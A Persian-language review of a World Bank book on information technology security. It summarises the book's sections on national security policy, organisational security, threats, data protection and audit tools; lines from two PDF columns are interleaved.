ﻫﻤﭽﻨﻴﻦ ﺑﺨﺶ ﺳﻮﻡ ﺑـﺮ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﻛـﻪ ﺑﻄـﻮﺭ ﻣـﺴﺘﻘﻴﻢ ﺑـﺎ
ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ ،ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻭ ﺩﻭﻟﺘـﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺷـﺒﻜﻪﺍﻱ ﺩﺭ ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺳﻮﻡ
ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ ﻣﺮﻭﺭﻱ ﻛﻠﻲ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﻣﺒﺎﺣﺚ ﻣﺘﺨﺼـﺼﻴﻦ ﻭ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ ﺩﺭﺑـﺎﺭﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ
ﺑﺨﺶ ﺳﻮﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺑﻌﺎﺩ ﺳﻴﺎﺳﺖ ﻭ ﺭﺍﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﻧﮕﺎﻩ
ﺍﻃﻼﻋﺎﺕ ﻣﻲﭘﺮﺩﺍﺯﺩ .ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﻣﺒﺎﺣﺚ ﻋﻤﻴﻖﺗﺮﻱ ﺭﺍﺟﻊ ﺑـﻪ
ﺳﺎﺯﻣﺎﻧﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ .ﺍﺗﺨﺎﺫ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺐ ﻭ
ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﻠﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻄﺮﺡ ﻣﻲﻛﻨﺪ ﻭ ﺍﻳﻦ
ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺁﻧﻬﺎ ﺧﻄﺮ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻧﺎﮔﻬـﺎﻧﻲ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ
ﻣﺴﺎﺋﻞ ﺭﺍ ﺩﺭ ﻗﺎﻟﺐ ﺟﻬﺎﻧﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻧﻤﺎﻳﺪ.
ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ ،ﻭﺭﻭﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑـﺴﻴﺎﺭ ﻣـﺸﻜﻠﺘﺮ
ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﻣﻲﻛﻨـﺪ ﻭ ﺍﺑـﺰﺍﺭ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﺣﻤـﻼﺕ ﻭ ﺍﺻـﻼﺡ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ .ﺑـﺮﺍﻱ ﺣﻔـﻆ ﺩﺍﺩﻩﻫـﺎﻱ
ﻣﺤﺮﻣﺎﻧــﻪ ﻭ ﻛﻤــﻚ ﺑــﻪ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺑﺮﻧﺎﻣــﻪﻫــﺎ ﻭ ﺩﺍﺩﻩﻫــﺎﻱ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﻋﻨﺎﻭﻳﻦ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻛـﻪ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﺍﻧﺘﻘﺎﻝ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ،ﺑﺎﻳﺪ ﺗﻠﻔﻴﻘـﻲ ﺍﺯ
ﻓﻬﻢ ﺁﻧﻬﺎ ﺩﺭ ﺳﻄﻮﺡ ﺩﻭﻟﺘﻲ ﻻﺯﻡ ﺍﺳﺖ .ﻳﻚ ﺩﻭﻟـﺖ ﻋـﻼﻭﻩ ﺑـﺮ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺍﻳﻦ ﺑﺨـﺶ ﺍﺟـﺰﺍﻱ
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ ﺧـﻮﺩ ،ﺑﺎﻳـﺪ ﻣﺘﻌﻬـﺪ ﺑﺎﺷـﺪ ﻛـﻪ ﻣﺨﺘﻠﻒ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣـﺆﺛﺮ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ
ﻣﺠﻤﻮﻋــﻪ ﺳﻴﺎﺳــﺘﻬﺎﻳﻲ ﺭﺍ ﺑــﺮﺍﻱ ﺍﻳﻤــﻦﺳــﺎﺧﺘﻦ ﺍﻃﻼﻋــﺎﺕ ﻣﺎﻧﻨﺪ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ،ﺩﻭﻟﺘﻬـﺎ ،ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺯﻳﺮﺳﺎﺧﺘﻲ ﻣﻠﻲ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﺪ .ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻧﻘﺶ ﻣﻬﻤـﻲ ﺩﺭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ.
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﺩ ،ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺗﻨﺎﻗﻀﻲ ﻧﻴﺰ ﻭﺟﻮﺩ
ﺑﺨﺶ ﺳﻮﻡ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻗﻴﻖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ
ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﭼﺎﺭﭼﻮﺏ ﺳﻴﺎﺳﺖ ﻣﻠﻲ ﺑﺎﻳﺪ ﻗـﺎﺩﺭ ﺑـﻪ
ﻣﻲﺩﻫﺪ:
ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻗﻮﺍﻧﻴﻦ ﺿﻌﻴﻒ ﺩﻭﻟﺘـﻲ ﺑـﻴﺶ ﺍﺯ
• ﺭﻭﺵ ﻫﺸﺖ ﺭﻛﻨﻲ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻛـﻪ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ
ﺁﻧﻜﻪ ﺳﻮﺩﻱ ﺩﺭ ﭘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺿـﺮﺭ ﺑـﻪ ﺑـﺎﺭ ﺧﻮﺍﻫﻨـﺪ ﺁﻭﺭﺩ.
ﻣﺤﻴﻄﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻭ ﺍﻋﺘﺒﺎﺭﻱ ﺍﺭﺯﺷﻤﻨﺪ ﻫﺴﺘﻨﺪ؛
ﻓﻨﺎﻭﺭﻱ ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﺪﻳـﺪ
ﺑﻪ ﺩﻟﻴﻞ ﻫﻤﻴﻦ ﺗﻐﻴﻴﺮﺍﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ .ﺩﺭ ﭼﻨـﻴﻦ ﻭﺿـﻌﻴﺘﻲ ﺍﺯ
ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘﻲ ﺑﺮﺍﻱ ﺑﻪ ﺩﺍﻡ ﺍﻧﺪﺍﺧﺘﻦ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﻭ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ
12 Authentication
13 Usernames
14 Passwords
16 Disaster Recovery 15 Remote Access Tools
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٢
ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﻣـﺴﺎﺋﻠﻲ ﻧﻈﻴـﺮ ﺍﻣﻨﻴـﺖ ﻛـﺎﺭﺑﺮﺍﻥ ﮔﺴﺘﺮﺵ ﺷﻴﻮﻩ ﻫﺎﻱ ﻧﻮﻳﻦ ﺧﻼﻓﻜﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ
ﺧﺎﻧﮕﻲ ،ﺍﻣﻨﻴﺖ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﭘﻴـﺎﺩﻩ ﺳـﺎﺯﻱ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﺗــﻮﺍﺯﻧﻲ ﻣﻨﺎﺳــﺐ ﻣﻴــﺎﻥ ﻣﻌﻴﺎﺭﻫــﺎﻱ ﺗﻘﻨﻴﻨــﻲ ﻭ
ﻛﻼﻥ ﺍﻣﻨﻴﺘـﻲ ﺩﺍﺭﻧـﺪ .ﺑﺨـﺶ ﭘـﻨﺠﻢ ﺑـﻪ ﺗﻔـﺼﻴﻞ ﺑـﻪ ﺑﺮﺭﺳـﻲ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺍﻫﻤﻴﺖ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﺩ .ﻭﺍﺿﺢ ﺍﺳـﺖ ﻛـﻪ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺗﻬﺪﻳﺪﺍﺕ ﻭﻳﮋﺓ ﺍﻣﻨﻴﺘﻲ ﻣﻲ ﭘﺮﺩﺍﺯﺩ ﻛﻪ ﺷﺎﻣﻞ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺍﺟﺘﻤﺎﻋﻲ ﻭ ﻓﻨـﻲ
ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ،ﺭﻭﺷـﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ ﺗﺮﺍﻓﻴـﻚ ﺍﻳﻨﺘﺮﻧﺖ ﺗﺪﻭﻳﻦ ﺷﺪﻩ ﺑﺎﺷﻨﺪ .ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺩﻭﻟﺘﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﺷﺒﻜﻪﻫﺎﻱ ﻣﻬﻢ ،ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ١٧ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﻳـﻦ ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ﺩﺭ ﻣﺴﺎﺋﻞ ﻓﻨﻲ ﮔﺎﻣﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ
ﺳﻴﺴﺘﻤﻬﺎ ،ﻭ ﺭﻭﺵ ﻣﻨﺎﺳﺐ ﻛﺎﺭ ﺑـﺎ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺯﻣـﺎﻥ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺩﺍﺭﻧﺪ.
ﺑﺤﺮﺍﻥ ﻣﻲﺑﺎﺷﺪ. ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺣﺎﻭﻱ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺍﺳﺖ:
ﺑﺨﺶ ﭘﻨﺠﻢ ﺣﺎﻭﻱ ﻣﻄﺎﻟﺐ ﺯﻳﺮ ﺍﺳﺖ: • ﺷﺒﻜﺔ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺩﻳﮕﺮ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﻪ ﻣﺘﻌﻠﻖ ﺑـﻪ
• ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻩ ﺍﻣﺎ ﻧﻈﺎﺭﺕ ﺑﺮ ﺁﻧﻬﺎ ﺑـﺎ ﺩﻭﻟـﺖ ﺍﺳـﺖ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺳﻴﺴﺘﻢ؛ )ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﻭﺍﺑﺴﺘﮕﻲ ﻣﺘﻘﺎﺑﻞ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ(؛
ﺗﻬﺪﻳـﺪﺍﺕ ﻣﺨﺘﻠــﻒ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺍﺯ ﺳــﻮﻱ • ﻧﻘﺶ ﻛﻠﻲ ﺩﻭﻟﺖ ﻭ ﻭﻇﺎﻳﻒ ﺁﻥ ﺩﺭ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ •
ﻋﻮﺍﻣﻞ ﻣﺤﻴﻄـﻲ ﺑـﺮﺍﻱ ﺧﺮﺍﺑﻜـﺎﺭﻱ ﻭ ﺩﺯﺩﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ،ﺧﺼﻮﺻﻲ ،ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ؛
ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ؛ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ •
ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺩﺍﺩﻩﻫــﺎ ﺩﺭ ﻣﻘﺎﺑﻠــﻪ ﺑــﺎ ﺍﻓ ـﺸﺎﻱ • ﺷﺒﻜﻪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺘﻲ ﺗﺪﻭﻳﻦ ﻣﻲﺷﻮﻧﺪ؛
١٨
ﻏﻴﺮﻋﻤﺪﻱ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺑﺎ ﻋﻨﺎﻭﻳﻦ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺩﺍﺩﻩﻫـﺎ ﻣﻔﺎﻫﻴﻢ ﺳﻨﺘﻲ ﻛﻪ ﺑﻪ ﻧﺤﻮﻱ ﺑـﻪ ﻗﺎﻟـﺐ ﻗـﻮﺍﻧﻴﻦ ﺭﺍﻳﺎﻧـﻪﺍﻱ •
)ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩﻫﺎ
١٩
ﻣﻨﺘﻘﻞ ﺷﺪﻩﺍﻧﺪ؛
ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻮﺳﻂ ﺁﻧﻬﺎ( ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫﺎ )ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺍﻃﻼﻋـﺎﺕ ﺑـﻲﻧﻘـﺺ ﻭ ﺻـﺤﻴﺢ ﺑـﺎﻗﻲﺧﻮﺍﻫﻨـﺪ ﻣﺎﻧـﺪ( ﻗﻮﺍﻧﻴﻦ ،ﻣﻘﺮﺭﺍﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺑﺮ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ •
ﻣــﻲﻛﻨــﺪ .ﺍﻳــﻦ ﻛﺘــﺎﺏ ﻫﻤﭽﻨــﻴﻦ ﺷــﺎﻣﻞ ﻣﺮﺍﺟــﻊ ﻓﺮﺍﻭﺍﻧــﻲ ﺍﺯ ﭼﮕــﻮﻧﮕﻲ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻣﻤﻴــﺰﻱ ٢٧ﻭ ﻭﺭﻭﺩ ﺑــﻪ •
ﻣﻮﺿﻮﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺍﺑﻌﺎﺩ ﺩﻳﮕﺮ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺳﻴﺐﭘـﺬﻳﺮ
ﭘﻮﺷﺶ ﻣﻲﺩﻫﻨﺪ ﻭ ﻟﺬﺍ ﺁﻣﻮﺧﺘﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ،ﮔـﺎﻣﻲ ﺩﺭ ﺟﻬـﺖ ﻭ ﻳﺎﻓﺘﻦ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ ﺭﻭﻱ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ
ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﻮﻟﻴﺪ ﻇﺮﻓﻴﺖ ﺩﺭ ﺳﻄﺢ ﻣﺤﻠﻲ ﺩﺭ ﺟﻬـﺎﻥ ﺭﻭ ﺷﺪﻩﺍﻧﺪ.
ﺑﻪ ﮔﺴﺘﺮﺵ ﺍﻣﺮﻭﺯ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ .ﺍﻳﻦ ﻛﺘـﺎﺏ ﺗﻮﺳـﻂ ﺑﺎﻧـﻚ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻓﻨﻲ ﻭﻳـﮋﻩ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢ ﻋﺎﻣﻠﻬـﺎﻱ ،Unix •
ﺟﻬﺎﻧﻲ ﻣﻨﺘﺸﺮ ﺷـﺪﻩ ﻭ ﺩﻳـﺴﻚ ﻓـﺸﺮﺩﻩ ﻭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺁﻥ ﻛـﻪ
،Windows ،Linuxﻭ Macintosh
ﺣــﺎﻭﻱ ﻣﻄﺎﻟــﺐ ﺟﺪﻳــﺪ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﺍﺳــﺖ ﻧﻴــﺰ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ
ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﺍﻭﻟـﻴﻦ ﻭﻳـﺮﺍﻳﺶ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﺑﻪ ﺩﻟﻴﻞ ﺣﺠﻢ ﻭ ﭘﻴﭽﻴﺪﮔﻲ ﻣﻮﺿـﻮﻉ ،ﭼﻨـﺪﻳﻦ ﺿـﻤﻴﻤﻪ ﻧﻴـﺰ ﺩﺭ
ﺍﺟﻼﺱ ﺟﻬﺎﻧﻲ ﺳـﺮﺍﻥ ﺟﺎﻣﻌـﺔ ﺍﻃﻼﻋـﺎﺗﻲ ) (WSISﺩﺭ ﮊﻧـﻮ ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﻛﺘﺎﺏ ﺁﻣﺪﻩ ﺍﺳﺖ.
ﺩﺳﺎﻣﺒﺮ ۲۰۰۳ﻣﻴﻼﺩﻱ ﺍﺭﺍﺋﻪ ﺷﺪ. ﭘﻴﻮﺳﺖ ۱ﺣﺎﻭﻱ ﻭﺍﮊﻩﻧﺎﻣﻪﺍﻱ ﺍﺯ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺠﻲ ﺍﺳـﺖ ﻛـﻪ
ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻃﺒﻖ ﻣﻨﺸﻮﺭ ﺣﻖ ﺗﻜﺜﻴﺮ ﺟﻬﺎﻧﻲ ٢٨ﻣﺎﻳﻞ ﺑـﻪ ﺣﻔـﻆ ﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻗــﺎﻧﻮﻥ ﺣــﻖ ﺗﻜﺜﻴــﺮ ﺍﻳــﻦ ﻛﺘــﺎﺏ ﺍﺳــﺖ ﻭ ﺑــﻪ ﻫــﻴﭻ ﻋﻨــﻮﺍﻥ ﻣﻲﮔﻴﺮﻧﺪ ،ﻭ ﭘﻴﻮﺳﺘﻬﺎﻱ ۲ﺗﺎ ۵ﻧﻴﺰ ﻣﺮﺍﺟﻊ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻬﻴﻪ
ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺗﺤﻘﻴﻖ ،ﺁﻣﻮﺯﺵ ﻭ ﺩﻳﮕﺮ ﻭ ﺗﺪﻭﻳﻦ ﻛﺘﺎﺏ ﺭﺍ ﻣﻌﺮﻓﻲ ﻧﻤﻮﺩﻩﺍﻧﺪ .ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺷﺎﻣﻞ ﻣـﺴﺘﻨﺪﺍﺕ
ﺍﻫﺪﺍﻑ ﺟﺰ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﺔ ﻋـﻀﻮ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ ﭼﺎﭘﻲ ،ﻣﺪﺍﺭﻙ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭﺑﺎﺭﺓ
ﻣﺠﺎﺯ ﻧﻤﻲﺑﺎﺷﺪ .ﻳﺎﻓﺘﻪﻫﺎ ،ﺗﻔﺎﺳﻴﺮ ﻭ ﻧﺘﺎﻳﺞ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﻫﺴﺘﻨﺪ .ﺗﻮﺻـﻴﻪ ﻣـﻲﺷـﻮﺩ
ﻫﻤﮕﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ ﻭ ﻧﺒﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺑﺎﻧـﻚ ﺗﻤﺎﻣﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺑﻪ ﻣﺮﺍﺟﻌﻲ ﻛﻪ ﺩﺭ ﺑﺨﺶ ﻣﻨﺎﺑﻊ ﻭ ﻣﺂﺧﺬ ﺫﻛـﺮ
ﺟﻬﺎﻧﻲ ،ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺁﻥ ،ﺍﻋﻀﺎﻱ ﻫﻴـﺄﺕ ﻣـﺪﻳﺮﻩ ﻭ ﻳـﺎ ﺷﺪﻩﺍﻧﺪ ﺳﺮﻱ ﺑﺰﻧﻨﺪ.
ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﻧﺴﺒﺖ ﺩﺍﺩ.
ﮔﺎﻣﻬﺎﻱ ﺁﺗﻲ ﻭ ﻧﺘﻴﺠﻪﮔﻴﺮﻱ
ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ
ﻛﻪ ﺗﺄﺛﻴﺮ ﻋﻤﺪﺓ ﺁﻧﻬﺎ ﺩﺭ ﺁﻣﻮﺯﺵ ﻭ ﭘﺮﻭﺭﺵ ،ﺑﻬﺪﺍﺷﺖ ،ﺗﺠـﺎﺭﺕ ﻭ
ﺩﻳﮕﺮ ﺑﺨﺸﻬﺎﻱ ﺟﺎﻣﻌﻪ ﻧﻤﺎﻳﺎﻥ ﺍﺳﺖ .ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ
ﻛﺸﻮﺭﻫﺎ ﻭ ﻣﺮﺩﻡ ﻣﻔﻴﺪ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺬﺍﺑﻴﺖ ﺧﺎﺻﻲ ﺑـﺮﺍﻱ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﻪ ﺁﻧﻬﺎ ﻛﻤﻚ ﻛﻨـﺪ ﺗـﺎ
